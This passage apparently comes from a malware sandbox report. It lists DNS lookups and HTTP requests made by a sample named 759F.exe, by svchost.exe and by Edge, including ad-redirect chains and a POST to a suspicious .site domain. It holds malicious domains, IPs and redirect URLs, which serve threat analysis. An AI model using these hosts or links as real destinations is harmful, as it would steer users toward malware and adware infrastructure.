                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          vexacion.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          Response
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          139.45.197.236
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://vexacion.com/afu.php?zoneid=1851513
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          GET /afu.php?zoneid=1851513 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378; syncedCookie=true
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:16:58 GMT
                                                                                          Content-Type: text/html; charset=utf8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 98113e683475f0a2c5d28f10e50b8116
                                                                                          Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:16:58 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:16:58 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://vexacion.com/?z=1851513&syncedCookie=false
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          POST /?z=1851513&syncedCookie=false HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1851513&var=1851513&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Content-Length: 540
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378; syncedCookie=true
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:16:59 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 8b382347c795606901bec59025e1bf7e
                                                                                          Link: <https://visit.fractalclick.com>; rel="preconnect dns-prefetch",<https://propeller-tracking.com>; rel="preconnect dns-prefetch"
                                                                                          Referrer-Policy: no-referrer
                                                                                          Location: https://visit.fractalclick.com/JisNOc/?utm_source=3552&utm_campaign=7700576&clck=437504070291296917&sid=1851513
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:16:59 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:16:59 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          my.rtmark.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          Response
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          139.45.195.8
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 1215
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:16:59 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          visit.fractalclick.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          visit.fractalclick.com
                                                                                          IN A
                                                                                          Response
                                                                                          visit.fractalclick.com
                                                                                          IN A
                                                                                          104.26.10.210
                                                                                          visit.fractalclick.com
                                                                                          IN A
                                                                                          104.26.11.210
                                                                                          visit.fractalclick.com
                                                                                          IN A
                                                                                          172.67.69.8
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://visit.fractalclick.com/JisNOc/?utm_source=3552&utm_campaign=7700576&clck=437504070291296917&sid=1851513
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.26.10.210:443
                                                                                          Request
                                                                                          GET /JisNOc/?utm_source=3552&utm_campaign=7700576&clck=437504070291296917&sid=1851513 HTTP/2.0
                                                                                          host: visit.fractalclick.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: http://vexacion.com/afu.php?zoneid=1851513&var=1851513&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          date: Fri, 09 Jul 2021 23:16:59 GMT
                                                                                          content-type: text/html
                                                                                          location: https://runswiftintenselythefile.vip/Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513
                                                                                          cf-cache-status: DYNAMIC
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HXWJ7HdpozMTgyGU2dquwPASdQNUKNiDaC9DmA3GQckwbViCGChR2kk3T%2BaGEEocK41ReuqhZWBHd5qLb0Mwjz8M2%2BNm6MeiEh8ulBZ6cYntcjrGJl7rDINQgTqzpcIm4OZO"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5435fbb244162-HAM
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          runswiftintenselythefile.vip
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          runswiftintenselythefile.vip
                                                                                          IN A
                                                                                          Response
                                                                                          runswiftintenselythefile.vip
                                                                                          IN A
                                                                                          3.208.146.20
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://runswiftintenselythefile.vip/Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          3.208.146.20:443
                                                                                          Request
                                                                                          GET /Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1851513&var=1851513&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: runswiftintenselythefile.vip
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:17:00 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: session=iRd9VxI3RpPm1uht2LxoCFvwLTLja_JV
                                                                                          Server: nginx
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          webjscontent.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          webjscontent.com
                                                                                          IN A
                                                                                          Response
                                                                                          webjscontent.com
                                                                                          IN A
                                                                                          104.26.11.220
                                                                                          webjscontent.com
                                                                                          IN A
                                                                                          104.26.10.220
                                                                                          webjscontent.com
                                                                                          IN A
                                                                                          172.67.73.103
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://webjscontent.com/dl.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.26.11.220:443
                                                                                          Request
                                                                                          GET /dl.min.js HTTP/2.0
                                                                                          host: webjscontent.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://runswiftintenselythefile.vip/Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:17:00 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          cf-cache-status: DYNAMIC
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TQC14ZzeTjTflbHkoP6qNHS%2BYNJAczrkW5T9mPH94v9M%2F3rrjaLkN9wsfknlboCXmWObjKrGVE7YRSs8%2BDLilydFRXzoHEC3UGWeGcGXAgPc4NwPtXE8wyUNPWIO"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c543642e454181-HAM
                                                                                          content-encoding: br
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://runswiftintenselythefile.vip/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          3.208.146.20:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: runswiftintenselythefile.vip
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Date: Fri, 09 Jul 2021 23:17:00 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 552
                                                                                          Connection: keep-alive
                                                                                          Server: nginx
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.71.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          Response
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          40.93.212.0
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          104.47.53.36
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          Response
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          104.47.53.36
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          40.93.212.0
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          accounts.snapchat.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          accounts.snapchat.com
                                                                                          IN A
                                                                                          Response
                                                                                          accounts.snapchat.com
                                                                                          IN CNAME
                                                                                          ghs.googlehosted.com
                                                                                          ghs.googlehosted.com
                                                                                          IN A
                                                                                          172.217.17.51
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.directdexchange.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.directdexchange.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.directdexchange.com
                                                                                          IN CNAME
                                                                                          directdexchange.com
                                                                                          directdexchange.com
                                                                                          IN A
                                                                                          35.201.70.46
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          35.201.70.46:80
                                                                                          Request
                                                                                          GET /jump/next.php?r=2087215 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.directdexchange.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Fri, 09 Jul 2021 23:20:58 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Content-Encoding: gzip
                                                                                          Via: 1.1 google
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.directdexchange.com/jump/next.php?stamat=m%7C%2CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbrandom=0.4444983392895643&cbtitle=&cbiframe=0&cbWidth=800&cbHeight=555&cbdescription=&cbkeywords=&cbref=
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          35.201.70.46:80
                                                                                          Request
                                                                                          GET /jump/next.php?stamat=m%7C%2CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbrandom=0.4444983392895643&cbtitle=&cbiframe=0&cbWidth=800&cbHeight=555&cbdescription=&cbkeywords=&cbref= HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.directdexchange.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Moved Temporarily
                                                                                          Server: openresty
                                                                                          Date: Fri, 09 Jul 2021 23:20:59 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Location: http://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2Cg2Z_dhfjoGU3Bv-GH0dEdHP3xP.8ed%2CbvxNWSCgUX2wN0iJxBQyUR7vIyZ_vZhfkY7yYmMCVOCl_0vxaxm8G84oahCjKPLQCkXc_RzIT98c-OfvbZ6CEvtY8_4f1SZFLwJGsIuMwyOkMgUBwjuR7MbXQtJgx27mFJanPjuotJ19tvCCO2T-fvCavAni-lXbIpS3gk42R852nkWikVKrH-h9SNWVKt8VPUU6B-52qkMPRG3mI8S0EDVC5yCkaXL89E_HPhCDJMoHeXFCRG7ZJIYWX8AvRLpZXIkEe9ze7KIMXMftIlCVERO4ASt8bmsq0JdJ8pwzfrkDJa_XVqR6AcZKEpDwCPhyNGcDbIp2pC82RSvZN-kxdbAP1vb67GoUUoPrEFNAKY7azuuNDT66MjS4SS0kvWHlX36sIVjn1NDGEcFYuKnIXtknQAoXF-X7WdOvJ9K_K5dZWQlmmzWbMmV8caHkSv-6btiR4nkPQEI2D5p7hKq2OqBxjvYio8Ndn4i00OlGhMth2c64fdXQBM7X10HsBBu6
                                                                                          Via: 1.1 google
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2Cg2Z_dhfjoGU3Bv-GH0dEdHP3xP.8ed%2CbvxNWSCgUX2wN0iJxBQyUR7vIyZ_vZhfkY7yYmMCVOCl_0vxaxm8G84oahCjKPLQCkXc_RzIT98c-OfvbZ6CEvtY8_4f1SZFLwJGsIuMwyOkMgUBwjuR7MbXQtJgx27mFJanPjuotJ19tvCCO2T-fvCavAni-lXbIpS3gk42R852nkWikVKrH-h9SNWVKt8VPUU6B-52qkMPRG3mI8S0EDVC5yCkaXL89E_HPhCDJMoHeXFCRG7ZJIYWX8AvRLpZXIkEe9ze7KIMXMftIlCVERO4ASt8bmsq0JdJ8pwzfrkDJa_XVqR6AcZKEpDwCPhyNGcDbIp2pC82RSvZN-kxdbAP1vb67GoUUoPrEFNAKY7azuuNDT66MjS4SS0kvWHlX36sIVjn1NDGEcFYuKnIXtknQAoXF-X7WdOvJ9K_K5dZWQlmmzWbMmV8caHkSv-6btiR4nkPQEI2D5p7hKq2OqBxjvYio8Ndn4i00OlGhMth2c64fdXQBM7X10HsBBu6
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          35.201.70.46:80
                                                                                          Request
